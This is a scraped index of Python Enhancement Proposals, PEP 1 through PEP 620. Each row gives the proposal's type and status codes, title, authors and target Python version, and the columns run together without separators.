+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
PEPTitleAuthors
PA1PEP Purpose and GuidelinesBarry Warsaw, Jeremy Hylton, David Goodger, Alyssa Coghlan
PA2Procedure for Adding New ModulesBrett Cannon, Martijn Faassen
PW3Guidelines for Handling Bug ReportsJeremy Hylton
PA4Deprecation of Standard ModulesBrett Cannon, Martin von Löwis
PS5Guidelines for Language EvolutionPaul Prescod
PS6Bug Fix ReleasesAahz, Anthony Baxter
PA7Style Guide for C CodeGuido van Rossum, Barry Warsaw
PA8Style Guide for Python CodeGuido van Rossum, Barry Warsaw, Alyssa Coghlan
PW9Sample Plaintext PEP TemplateBarry Warsaw
PA10Voting GuidelinesBarry Warsaw
PA11CPython platform supportMartin von Löwis, Brett Cannon
PA12Sample reStructuredText PEP TemplateDavid Goodger, Barry Warsaw, Brett Cannon
PA13Python Language GovernanceThe Python core team and community
IA20The Zen of PythonTim Peters
PW42Feature RequestsJeremy Hylton
SF100Python Unicode IntegrationMarc-André Lemburg2.0
IA101Doing Python Releases 101Barry Warsaw, Guido van Rossum
IS102Doing Python Micro ReleasesAnthony Baxter, Barry Warsaw, Guido van Rossum
IW103Collecting information about gitOleg Broytman
IF160Python 1.6 Release ScheduleFred L. Drake, Jr.1.6
IF200Python 2.0 Release ScheduleJeremy Hylton2.0
SF201Lockstep IterationBarry Warsaw2.0
SF202List ComprehensionsBarry Warsaw2.0
SF203Augmented AssignmentsThomas Wouters2.0
SR204Range LiteralsThomas Wouters2.0
SF205Weak ReferencesFred L. Drake, Jr.2.1
IW206Python Advanced LibraryA.M. Kuchling
SF207Rich ComparisonsGuido van Rossum, David Ascher2.1
SF208Reworking the Coercion ModelNeil Schemenauer, Marc-André Lemburg2.1
SW209Multi-dimensional ArraysPaul Barrett, Travis Oliphant2.2
SR210Decoupling the Interpreter LoopDavid Ascher2.1
SR211Adding A New Outer Product OperatorGreg Wilson2.1
SR212Loop Counter IterationPeter Schneider-Kamp2.1
SD213Attribute Access HandlersPaul Prescod2.1
SF214Extended Print StatementBarry Warsaw2.0
SS215String InterpolationKa-Ping Yee2.1
IW216Docstring FormatMoshe Zadka
SF217Display Hook for Interactive UseMoshe Zadka2.1
SF218Adding a Built-In Set Object TypeGreg Wilson, Raymond Hettinger2.2
SD219Stackless PythonGordon McMillan2.1
IR220Coroutines, Generators, ContinuationsGordon McMillan
SF221Import AsThomas Wouters2.0
SD222Web Library EnhancementsA.M. Kuchling2.1
SF223Change the Meaning of x EscapesTim Peters2.0
SR224Attribute DocstringsMarc-André Lemburg2.1
SR225Elementwise/Objectwise OperatorsHuaiyu Zhu, Gregory Lielens2.1
IF226Python 2.1 Release ScheduleJeremy Hylton2.1
SF227Statically Nested ScopesJeremy Hylton2.1
SW228Reworking Python’s Numeric ModelMoshe Zadka, Guido van Rossum
SF229Using Distutils to Build PythonA.M. Kuchling2.1
SF230Warning FrameworkGuido van Rossum2.1
SR231__findattr__()Barry Warsaw2.1
SF232Function AttributesBarry Warsaw2.1
SD233Python Online HelpPaul Prescod2.1
SF234IteratorsKa-Ping Yee, Guido van Rossum2.1
SF235Import on Case-Insensitive PlatformsTim Peters2.1
SF236Back to the __future__Tim Peters2.1
SF237Unifying Long Integers and IntegersMoshe Zadka, Guido van Rossum2.2
SF238Changing the Division OperatorMoshe Zadka, Guido van Rossum2.2
SR239Adding a Rational Type to PythonChristopher A. Craig, Moshe Zadka2.2
SR240Adding a Rational Literal to PythonChristopher A. Craig, Moshe Zadka2.2
SS241Metadata for Python Software PackagesA.M. Kuchling
SW242Numeric KindsPaul F. Dubois2.2
SW243Module Repository Upload MechanismSean Reifschneider2.1
SR244The directive statementMartin von Löwis2.1
SR245Python Interface SyntaxMichel Pelletier2.2
SR246Object AdaptationAlex Martelli, Clark C. Evans2.5
IF247API for Cryptographic Hash FunctionsA.M. Kuchling
IF248Python Database API Specification v1.0Greg Stein, Marc-André Lemburg
IF249Python Database API Specification v2.0Marc-André Lemburg
SF250Using site-packages on WindowsPaul Moore2.2
IF251Python 2.2 Release ScheduleBarry Warsaw, Guido van Rossum2.2
SF252Making Types Look More Like ClassesGuido van Rossum2.2
SF253Subtyping Built-in TypesGuido van Rossum2.2
SR254Making Classes Look More Like TypesGuido van Rossum2.2
SF255Simple GeneratorsNeil Schemenauer, Tim Peters, Magnus Lie Hetland2.2
SR256Docstring Processing System FrameworkDavid Goodger
IA257Docstring ConventionsDavid Goodger, Guido van Rossum
SR258Docutils Design SpecificationDavid Goodger
SR259Omit printing newline after newlineGuido van Rossum2.2
SF260Simplify xrange()Guido van Rossum2.2
SF261Support for “wide” Unicode charactersPaul Prescod2.2
SR262A Database of Installed Python PackagesA.M. Kuchling
SF263Defining Python Source Code EncodingsMarc-André Lemburg, Martin von Löwis2.3
SF264Future statements in simulated shellsMichael Hudson2.2
SR265Sorting Dictionaries by ValueGrant Griffin2.2
SW266Optimizing Global Variable/Attribute AccessSkip Montanaro2.3
SD267Optimized Access to Module NamespacesJeremy Hylton2.2
SR268Extended HTTP functionality and WebDAVGreg Stein2.x
SD269Pgen Module for PythonJonathan Riehl2.2
SR270uniq method for list objectsJason Petrone2.2
SR271Prefixing sys.path by command line optionFrédéric B. Giacometti2.2
IF272API for Block Encryption Algorithms v1.0A.M. Kuchling
SF273Import Modules from Zip ArchivesJames C. Ahlstrom2.3
SF274Dict ComprehensionsBarry Warsaw2.7, 3.0
SR275Switching on Multiple ValuesMarc-André Lemburg2.6
SR276Simple Iterator for intsJim Althoff2.3
SF277Unicode file name support for Windows NTNeil Hodgson2.3
SF278Universal Newline SupportJack Jansen2.3
SF279The enumerate() built-in functionRaymond Hettinger2.3
SD280Optimizing access to globalsGuido van Rossum2.3
SR281Loop Counter Iteration with range and xrangeMagnus Lie Hetland2.3
SF282A Logging SystemVinay Sajip, Trent Mick2.3
IF283Python 2.3 Release ScheduleGuido van Rossum2.3
SR284Integer for-loopsDavid Eppstein, Gregory Ewing2.3
SF285Adding a bool typeGuido van Rossum2.3
SD286Enhanced Argument TuplesMartin von Löwis2.3
IA287reStructuredText Docstring FormatDavid Goodger
SW288Generators Attributes and ExceptionsRaymond Hettinger2.5
SF289Generator ExpressionsRaymond Hettinger2.4
IA290Code Migration and ModernizationRaymond Hettinger
IS291Backward Compatibility for the Python 2 Standard LibraryNeal Norwitz2.3
SF292Simpler String SubstitutionsBarry Warsaw2.4
SF293Codec Error Handling CallbacksWalter Dörwald2.3
SR294Type Names in the types ModuleOren Tirosh2.5
SR295Interpretation of multiline string constantsStepan Koltsov3.0
SW296Adding a bytes Object TypeScott Gilbert2.3
SR297Support for System UpgradesMarc-André Lemburg2.6
SW298The Locked Buffer InterfaceThomas Heller2.3
SR299Special __main__() function in modulesJeff Epler2.3
SF301Package Index and Metadata for DistutilsRichard Jones2.3
SF302New Import HooksJust van Rossum, Paul Moore2.3
SR303Extend divmod() for Multiple DivisorsThomas Bellman2.3
SW304Controlling Generation of Bytecode FilesSkip Montanaro
SF305CSV File APIKevin Altis, Dave Cole, Andrew McNamara, Skip Montanaro, Cliff Wells2.3
IW306How to Change Python’s GrammarMichael Hudson, Jack Diederich, Alyssa Coghlan, Benjamin Peterson
SF307Extensions to the pickle protocolGuido van Rossum, Tim Peters2.3
SF308Conditional ExpressionsGuido van Rossum, Raymond Hettinger2.5
SF309Partial Function ApplicationPeter Harris2.5
SR310Reliable Acquisition/Release PairsMichael Hudson, Paul Moore2.4
SF311Simplified Global Interpreter Lock Acquisition for ExtensionsMark Hammond2.3
SD312Simple Implicit LambdaRoman Suzi, Alex Martelli2.4
SR313Adding Roman Numeral Literals to PythonMike Meyer2.4
SS314Metadata for Python Software Packages 1.1A.M. Kuchling, Richard Jones2.5
SR315Enhanced While LoopRaymond Hettinger, W Isaac Carroll2.5
SD316Programming by Contract for PythonTerence Way
SR317Eliminate Implicit Exception InstantiationSteven Taschuk2.4
SF318Decorators for Functions and MethodsKevin D. Smith, Jim J. Jewett, Skip Montanaro, Anthony Baxter2.4
SR319Python Synchronize/Asynchronize BlockMichel Pelletier2.4
IF320Python 2.4 Release ScheduleBarry Warsaw, Raymond Hettinger, Anthony Baxter2.4
SW321Date/Time Parsing and FormattingA.M. Kuchling2.4
SF322Reverse IterationRaymond Hettinger2.4
SD323Copyable IteratorsAlex Martelli2.5
SF324subprocess - New process modulePeter Astrand2.4
SR325Resource-Release Support for GeneratorsSamuele Pedroni2.4
SR326A Case for Top and Bottom ValuesJosiah Carlson, Terry Reedy2.4
SF327Decimal Data TypeFacundo Batista2.4
SF328Imports: Multi-Line and Absolute/RelativeAahz2.4, 2.5, 2.6
SR329Treating Builtins as Constants in the Standard LibraryRaymond Hettinger2.4
SR330Python Bytecode VerificationMichel Pelletier2.6
SF331Locale-Independent Float/String ConversionsChristian R. Reis2.4
SR332Byte vectors and String/Unicode UnificationSkip Montanaro2.5
IF333Python Web Server Gateway Interface v1.0Phillip J. Eby
SW334Simple Coroutines via SuspendIterationClark C. Evans3.0
SR335Overloadable Boolean OperatorsGregory Ewing3.3
SR336Make None CallableAndrew McClelland
SD337Logging Usage in the Standard LibraryMichael P. Dubner2.5
SF338Executing modules as scriptsAlyssa Coghlan2.5
IW339Design of the CPython CompilerBrett Cannon
SR340Anonymous Block StatementsGuido van Rossum
SF341Unifying try-except and try-finallyGeorg Brandl2.5
SF342Coroutines via Enhanced GeneratorsGuido van Rossum, Phillip J. Eby2.5
SF343The “with” StatementGuido van Rossum, Alyssa Coghlan2.5
SS344Exception Chaining and Embedded TracebacksKa-Ping Yee2.5
SS345Metadata for Python Software Packages 1.2Richard Jones2.7
SW346User Defined (“with”) StatementsAlyssa Coghlan2.5
PF347Migrating the Python CVS to SubversionMartin von Löwis
SR348Exception Reorganization for Python 3.0Brett Cannon
SR349Allow str() to return unicode stringsNeil Schemenauer2.5
IR350CodetagsMicah Elliott
SR351The freeze protocolBarry Warsaw
SF352Required Superclass for ExceptionsBrett Cannon, Guido van Rossum2.5
SF353Using ssize_t as the index typeMartin von Löwis2.5
SS354Enumerations in PythonBen Finney2.6
SR355Path - Object oriented filesystem pathsBjörn Lindqvist2.5
IF356Python 2.5 Release ScheduleNeal Norwitz, Guido van Rossum, Anthony Baxter2.5
SF357Allowing Any Object to be Used for SlicingTravis Oliphant2.5
SF358The “bytes” ObjectNeil Schemenauer, Guido van Rossum2.6, 3.0
SW359The “make” StatementSteven Bethard2.6
PF360Externally Maintained PackagesBrett Cannon
IF361Python 2.6 and 3.0 Release ScheduleNeal Norwitz, Barry Warsaw2.6, 3.0
SF362Function Signature ObjectBrett Cannon, Jiwon Seo, Yury Selivanov, Larry Hastings3.3
SR363Syntax For Dynamic Attribute AccessBen North
SW364Transitioning to the Py3K Standard LibraryBarry Warsaw2.6
SR365Adding the pkg_resources modulePhillip J. Eby
SF366Main module explicit relative importsAlyssa Coghlan2.6, 3.0
SS367New SuperCalvin Spealman, Tim Delaney2.6
SD368Standard image protocol and classLino Mastrodomenico2.6, 3.0
SW369Post import hooksChristian Heimes2.6, 3.0
SF370Per user site-packages directoryChristian Heimes2.6, 3.0
SF371Addition of the multiprocessing package to the standard libraryJesse Noller, Richard Oudkerk2.6, 3.0
SF372Adding an ordered dictionary to collectionsArmin Ronacher, Raymond Hettinger2.7, 3.1
IF373Python 2.7 Release ScheduleBenjamin Peterson2.7
PF374Choosing a distributed VCS for the Python projectBrett Cannon, Stephen J. Turnbull, Alexandre Vassalotti, Barry Warsaw, Dirkjan Ochtman
IF375Python 3.1 Release ScheduleBenjamin Peterson3.1
SF376Database of Installed Python DistributionsTarek Ziadé2.7, 3.2
SR377Allow __enter__() methods to skip the statement bodyAlyssa Coghlan2.7, 3.1
SF378Format Specifier for Thousands SeparatorRaymond Hettinger2.7, 3.1
SW379Adding an Assignment ExpressionJervis Whitley2.7, 3.2
SF380Syntax for Delegating to a SubgeneratorGregory Ewing3.3
SW381Mirroring infrastructure for PyPITarek Ziadé, Martin von Löwis
SR382Namespace PackagesMartin von Löwis3.2
SF383Non-decodable Bytes in System Character InterfacesMartin von Löwis3.1
SF384Defining a Stable ABIMartin von Löwis3.2
PF385Migrating from Subversion to MercurialDirkjan Ochtman, Antoine Pitrou, Georg Brandl
SS386Changing the version comparison module in DistutilsTarek Ziadé
PA387Backwards Compatibility PolicyBenjamin Peterson
SF389argparse - New Command Line Parsing ModuleSteven Bethard2.7, 3.2
SR390Static metadata for DistutilsTarek Ziadé2.7, 3.2
SF391Dictionary-Based Configuration For LoggingVinay Sajip2.7, 3.2
IF392Python 3.2 Release ScheduleGeorg Brandl3.2
SF393Flexible String RepresentationMartin von Löwis3.3
IA394The “python” Command on Unix-Like SystemsKerrick Staley, Alyssa Coghlan, Barry Warsaw, Petr Viktorin, Miro Hrončok, Carol Willing
SW395Qualified Names for ModulesAlyssa Coghlan3.4
IW396Module Version NumbersBarry Warsaw
SF397Python launcher for WindowsMark Hammond, Martin von Löwis3.3
IF398Python 3.3 Release ScheduleGeorg Brandl3.3
IF399Pure Python/C Accelerator Module Compatibility RequirementsBrett Cannon3.3
SD400Deprecate codecs.StreamReader and codecs.StreamWriterVictor Stinner3.3
PR401BDFL RetirementBarry Warsaw, Brett Cannon
SR402Simplified Package Layout and PartitioningPhillip J. Eby3.3
SD403General purpose decorator clause (aka “@in” clause)Alyssa Coghlan3.4
IF404Python 2.8 Un-release ScheduleBarry Warsaw2.8
SF405Python Virtual EnvironmentsCarl Meyer3.3
SW406Improved Encapsulation of Import StateAlyssa Coghlan, Greg Slodkowicz3.4
PD407New release cycle and introducing long-term support versionsAntoine Pitrou, Georg Brandl, Barry Warsaw
SR408Standard library __preview__ packageAlyssa Coghlan, Eli Bendersky3.3
SF409Suppressing exception contextEthan Furman3.3
SR410Use decimal.Decimal type for timestampsVictor Stinner3.3
IS411Provisional packages in the Python standard libraryAlyssa Coghlan, Eli Bendersky3.3
SF412Key-Sharing DictionaryMark Shannon3.3
PW413Faster evolution of the Python Standard LibraryAlyssa Coghlan
SF414Explicit Unicode Literal for Python 3.3Armin Ronacher, Alyssa Coghlan3.3
SF415Implement context suppression with exception attributesBenjamin Peterson3.3
SR416Add a frozendict builtin typeVictor Stinner3.3
SF417Including mock in the Standard LibraryMichael Foord3.3
SF418Add monotonic time, performance counter, and process time functionsCameron Simpson, Jim J. Jewett, Stephen J. Turnbull, Victor Stinner3.3
SD419Protecting cleanup statements from interruptionsPaul Colomiets3.3
SF420Implicit Namespace PackagesEric V. Smith3.3
SF421Adding sys.implementationEric Snow3.3
SW422Simpler customisation of class creationAlyssa Coghlan, Daniel Urban3.5
ID423Naming conventions and recipes related to packagingBenoit Bryon
SF424A method for exposing a length hintAlex Gaynor3.4
SF425Compatibility Tags for Built DistributionsDaniel Holth3.4
IW426Metadata for Python Software Packages 2.0Alyssa Coghlan, Daniel Holth, Donald Stufft
SF427The Wheel Binary Package Format 1.0Daniel Holth
SF428The pathlib module – object-oriented filesystem pathsAntoine Pitrou3.4
IF429Python 3.4 Release ScheduleLarry Hastings3.4
IF430Migrating to Python 3 as the default online documentationAlyssa Coghlan
SS431Time zone support improvementsLennart Regebro
SW432Restructuring the CPython startup sequenceAlyssa Coghlan, Victor Stinner, Eric Snow
SS433Easier suppression of file descriptor inheritanceVictor Stinner3.4
IA434IDLE Enhancement Exception for All BranchesTodd Rovito, Terry Reedy
SF435Adding an Enum type to the Python standard libraryBarry Warsaw, Eli Bendersky, Ethan Furman3.4
SF436The Argument Clinic DSLLarry Hastings3.4
SR437A DSL for specifying signatures, annotations and argument convertersStefan Krah3.4
PS438Transitioning to release-file hosting on PyPIHolger Krekel, Carl Meyer
SR439Inclusion of implicit pip bootstrap in Python installationRichard Jones3.4
SF440Version Identification and Dependency SpecificationAlyssa Coghlan, Donald Stufft
SF441Improving Python ZIP Application SupportDaniel Holth, Paul Moore3.5
SF442Safe object finalizationAntoine Pitrou3.4
SF443Single-dispatch generic functionsŁukasz Langa3.4
ID444Python Web3 InterfaceChris McDonough, Armin Ronacher
SF445Add new APIs to customize Python memory allocatorsVictor Stinner3.4
SF446Make newly created file descriptors non-inheritableVictor Stinner3.4
SD447Add __getdescriptor__ method to metaclassRonald Oussoren
SF448Additional Unpacking GeneralizationsJoshua Landau3.5
PF449Removal of the PyPI Mirror Auto Discovery and Naming SchemeDonald Stufft
SF450Adding A Statistics Module To The Standard LibrarySteven D’Aprano3.4
SF451A ModuleSpec Type for the Import SystemEric Snow3.4
IF452API for Cryptographic Hash Functions v2.0A.M. Kuchling, Christian Heimes
SF453Explicit bootstrapping of pip in Python installationsDonald Stufft, Alyssa Coghlan
SF454Add a new tracemalloc module to trace Python memory allocationsVictor Stinner3.4
SR455Adding a key-transforming dictionary to collectionsAntoine Pitrou3.5
SF456Secure and interchangeable hash algorithmChristian Heimes3.4
IF457Notation For Positional-Only ParametersLarry Hastings
SA458Secure PyPI downloads with signed repository metadataTrishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SW459Standard Metadata Extensions for Python Software PackagesAlyssa Coghlan
SW460Add binary interpolation and formattingAntoine Pitrou3.5
SF461Adding % formatting to bytes and bytearrayEthan Furman3.5
PW462Core development workflow automation for CPythonAlyssa Coghlan
SR463Exception-catching expressionsChris Angelico3.5
PF464Removal of the PyPI Mirror Authenticity APIDonald Stufft
SF465A dedicated infix operator for matrix multiplicationNathaniel J. Smith3.5
SF466Network Security Enhancements for Python 2.7.xAlyssa Coghlan2.7.9
S467Minor API improvements for binary sequencesAlyssa Coghlan, Ethan Furman3.13
SF468Preserving the order of **kwargs in a function.Eric Snow3.6
SW469Migration of dict iteration code to Python 3Alyssa Coghlan3.5
PF470Removing External Hosting Support on PyPIDonald Stufft
SF471os.scandir() function – a better and faster directory iteratorBen Hoyt3.5
SR472Support for indexing with keyword argumentsStefano Borini, Joseph Martinot-Lagarde3.6
SR473Adding structured data to built-in exceptionsSebastian Kreft
PW474Creating forge.python.orgAlyssa Coghlan
SF475Retry system calls failing with EINTRCharles-François Natali, Victor Stinner3.5
SF476Enabling certificate verification by default for stdlib http clientsAlex Gaynor2.7.9, 3.4.3, 3.5
SF477Backport ensurepip (PEP 453) to Python 2.7Donald Stufft, Alyssa Coghlan
IF478Python 3.5 Release ScheduleLarry Hastings3.5
SF479Change StopIteration handling inside generatorsChris Angelico, Guido van Rossum3.5
S480Surviving a Compromise of PyPI: End-to-end signing of packagesTrishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
PW481Migrate CPython to Git, Github, and PhabricatorDonald Stufft
IF482Literature Overview for Type HintsŁukasz Langa
IF483The Theory of Type HintsGuido van Rossum, Ivan Levkivskyi
SF484Type HintsGuido van Rossum, Jukka Lehtosalo, Łukasz Langa3.5
SF485A Function for testing approximate equalityChristopher Barker3.5
SF486Make the Python Launcher aware of virtual environmentsPaul Moore3.5
SF487Simpler customisation of class creationMartin Teichmann3.6
SF488Elimination of PYO filesBrett Cannon3.5
SF489Multi-phase extension module initializationPetr Viktorin, Stefan Behnel, Alyssa Coghlan3.5
SR490Chain exceptions at C levelVictor Stinner3.6
SD491The Wheel Binary Package Format 1.9Daniel Holth
SF492Coroutines with async and await syntaxYury Selivanov3.5
SF493HTTPS verification migration tools for Python 2.7Alyssa Coghlan, Robert Kuska, Marc-André Lemburg2.7.12
IF494Python 3.6 Release ScheduleNed Deily3.6
SF495Local Time DisambiguationAlexander Belopolsky, Tim Peters3.6
IR496Environment MarkersJames Polley
PR497A standard mechanism for backward compatibilityEd Schofield
SF498Literal String InterpolationEric V. Smith3.6
SD499python -m foo should also bind ‘foo’ in sys.modulesCameron Simpson, Chris Angelico, Joseph Jevnik3.10
SR500A protocol for delegating datetime methods to their tzinfo implementationsAlexander Belopolsky, Tim Peters
SW501General purpose template literal stringsAlyssa Coghlan, Nick Humrich3.12
IR502String Interpolation - Extended DiscussionMike G. Miller3.6
SF503Simple Repository APIDonald Stufft
SW504Using the System RNG by defaultAlyssa Coghlan3.6
SD505None-aware operatorsMark E. Haase, Steve Dower3.8
SF506Adding A Secrets Module To The Standard LibrarySteven D’Aprano3.6
PR507Migrate CPython to Git and GitLabBarry Warsaw
SF508Dependency specification for Python Software PackagesRobert Collins
SS509Add a private version to dictVictor Stinner3.6
SR510Specialize functions with guardsVictor Stinner3.6
SR511API for code transformersVictor Stinner3.6
PF512Migrating from hg.python.org to GitHubBrett Cannon
IS513A Platform Tag for Portable Linux Built DistributionsRobert T. McGibbon, Nathaniel J. Smith
IA514Python registration in the Windows registrySteve Dower
SF515Underscores in Numeric LiteralsGeorg Brandl, Serhiy Storchaka3.6
SR516Build system abstraction for pip/conda etcRobert Collins, Nathaniel J. Smith
SF517A build-system independent format for source treesNathaniel J. Smith, Thomas Kluyver
SF518Specifying Minimum Build System Requirements for Python ProjectsBrett Cannon, Nathaniel J. Smith, Donald Stufft
SF519Adding a file system path protocolBrett Cannon, Koos Zevenhoven3.6
SF520Preserving Class Attribute Definition OrderEric Snow3.6
SW521Managing global context via ‘with’ blocks in generators and coroutinesNathaniel J. Smith3.6
SR522Allow BlockingIOError in security sensitive APIsAlyssa Coghlan, Nathaniel J. Smith3.6
SF523Adding a frame evaluation API to CPythonBrett Cannon, Dino Viehland3.6
SF524Make os.urandom() blocking on LinuxVictor Stinner3.6
SF525Asynchronous GeneratorsYury Selivanov3.6
SF526Syntax for Variable AnnotationsRyan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum3.6
SF527Removing Un(der)used file types/extensions on PyPIDonald Stufft
SF528Change Windows console encoding to UTF-8Steve Dower3.6
SF529Change Windows filesystem encoding to UTF-8Steve Dower3.6
SF530Asynchronous ComprehensionsYury Selivanov3.6
SW531Existence checking operatorsAlyssa Coghlan3.7
SD532A circuit breaking protocol and binary operatorsAlyssa Coghlan, Mark E. Haase3.8
SD533Deterministic cleanup for iteratorsNathaniel J. Smith
SD534Improved Errors for Missing Standard Library ModulesTomáš Orsava, Petr Viktorin, Alyssa Coghlan
SD535Rich comparison chainingAlyssa Coghlan3.8
SW536Final Grammar for Literal String InterpolationPhilipp Angerer3.7
IF537Python 3.7 Release ScheduleNed Deily3.7
SF538Coercing the legacy C locale to a UTF-8 based localeAlyssa Coghlan3.7
SF539A New C-API for Thread-Local Storage in CPythonErik M. Bray, Masayuki Yamamoto3.7
SF540Add a new UTF-8 ModeVictor Stinner3.7
PF541Package Index Name RetentionŁukasz Langa
SR542Dot Notation Assignment In Function HeaderMarkus Meskanen
SW543A Unified TLS API for PythonCory Benfield, Christian Heimes3.7
SF544Protocols: Structural subtyping (static duck typing)Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa3.8
PA545Python Documentation TranslationsJulien Palard, Inada Naoki, Victor Stinner
SR546Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7Victor Stinner, Cory Benfield2.7
SD547Running extension modules using the -m optionMarcel Plch, Petr Viktorin3.7
SR548More Flexible Loop ControlR David Murray3.7
SR549Instance DescriptorsLarry Hastings3.7
SW550Execution ContextYury Selivanov, Elvis Pranskevichus3.7
IW551Security transparency in the Python runtimeSteve Dower3.7
SF552Deterministic pycsBenjamin Peterson3.7
SF553Built-in breakpoint()Barry Warsaw3.7
SS554Multiple Interpreters in the StdlibEric Snow3.13
SW555Context-local variables (contextvars)Koos Zevenhoven3.7
SD556Threaded garbage collectionAntoine Pitrou3.7
SF557Data ClassesEric V. Smith3.7
SW558Defined semantics for locals()Alyssa Coghlan3.13
SR559Built-in noop()Barry Warsaw3.7
SF560Core support for typing module and generic typesIvan Levkivskyi3.7
SF561Distributing and Packaging Type InformationEthan Smith3.7
SF562Module __getattr__ and __dir__Ivan Levkivskyi3.7
SA563Postponed Evaluation of AnnotationsŁukasz Langa3.7
SF564Add new time functions with nanosecond resolutionVictor Stinner3.7
SF565Show DeprecationWarning in __main__Alyssa Coghlan3.7
SF566Metadata for Python Software Packages 2.1Dustin Ingram3.x
SF567Context VariablesYury Selivanov3.7
SD568Generator-sensitivity for Context VariablesNathaniel J. Smith3.8
IF569Python 3.8 Release ScheduleŁukasz Langa3.8
SF570Python Positional-Only ParametersLarry Hastings, Pablo Galindo, Mario Corchero, Eric N. Vander Weele3.8
IS571The manylinux2010 Platform TagMark Williams, Geoffrey Thomas, Thomas Kluyver
SF572Assignment ExpressionsChris Angelico, Tim Peters, Guido van Rossum3.8
SF573Module State Access from C Extension MethodsPetr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch3.9
SF574Pickle protocol 5 with out-of-band dataAntoine Pitrou3.8
SW575Unifying function/method classesJeroen Demeyer3.8
SW576Rationalize Built-in function classesMark Shannon3.8
SW577Augmented Assignment ExpressionsAlyssa Coghlan3.8
SF578Python Runtime Audit HooksSteve Dower3.8
IF579Refactoring C functions and methodsJeroen Demeyer
SR580The C call protocolJeroen Demeyer3.8
PF581Using GitHub Issues for CPythonMariatta
SR582Python local packages directoryKushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan3.12
IW583A Concurrency Memory Model for PythonJeffrey Yasskin
SF584Add Union Operators To dictSteven D’Aprano, Brandt Bucher3.9
SF585Type Hinting Generics In Standard CollectionsŁukasz Langa3.9
SF586Literal TypesMichael Lee, Ivan Levkivskyi, Jukka Lehtosalo3.8
SF587Python Initialization ConfigurationVictor Stinner, Alyssa Coghlan3.8
IF588GitHub Issues Migration PlanMariatta
SF589TypedDict: Type Hints for Dictionaries with a Fixed Set of KeysJukka Lehtosalo3.8
SA590Vectorcall: a fast calling protocol for CPythonMark Shannon, Jeroen Demeyer3.8
SF591Adding a final qualifier to typingMichael J. Sullivan, Ivan Levkivskyi3.8
SF592Adding “Yank” Support to the Simple APIDonald Stufft
SF593Flexible function and variable annotationsTill Varoquaux, Konstantin Kashin3.9
SF594Removing dead batteries from the standard libraryChristian Heimes, Brett Cannon3.11
IW595Improving bugs.python.orgEzio Melotti, Berker Peksag
IA596Python 3.9 Release ScheduleŁukasz Langa3.9
SF597Add optional EncodingWarningInada Naoki3.10
IW598Introducing incremental feature releasesAlyssa Coghlan3.9
IS599The manylinux2014 Platform TagDustin Ingram
SF600Future ‘manylinux’ Platform Tags for Portable Linux Built DistributionsNathaniel J. Smith, Thomas Kluyver
SR601Forbid return/break/continue breaking out of finallyDamien George, Batuhan Taskaya3.8
PA602Annual Release Cycle for PythonŁukasz Langa3.9
S603Adding a frozenmap type to collectionsYury Selivanov
SF604Allow writing union types as X | YPhilippe PRADOS, Maggie Moss3.10
IR605A rolling feature release stream for CPythonSteve Dower, Alyssa Coghlan3.9
SR606Python Compatibility VersionVictor Stinner3.9
IF607Reducing CPython’s Feature Delivery LatencyŁukasz Langa, Steve Dower, Alyssa Coghlan3.9
SR608Coordinated Python releaseMiro Hrončok, Victor Stinner3.9
PA609Python Packaging Authority (PyPA) GovernanceDustin Ingram, Pradyun Gedam, Sumana Harihareswara
SF610Recording the Direct URL Origin of installed distributionsStéphane Bidoul, Chris Jerdonek
SW611The one million limitMark Shannon
SF612Parameter Specification VariablesMark Mendoza3.10
SF613Explicit Type AliasesShannon Zhu3.10
SF614Relaxing Grammar Restrictions On DecoratorsBrandt Bucher3.9
SF615Support for the IANA Time Zone Database in the Standard LibraryPaul Ganssle3.9
SF616String methods to remove prefixes and suffixesDennis Sweeney3.9
SF617New PEG parser for CPythonGuido van Rossum, Pablo Galindo, Lysandros Nikolaou3.9
SF618Add Optional Length-Checking To zipBrandt Bucher3.10
IA619Python 3.10 Release SchedulePablo Galindo Salgado3.10
SW620Hide implementation details from the C APIVictor Stinner3.12
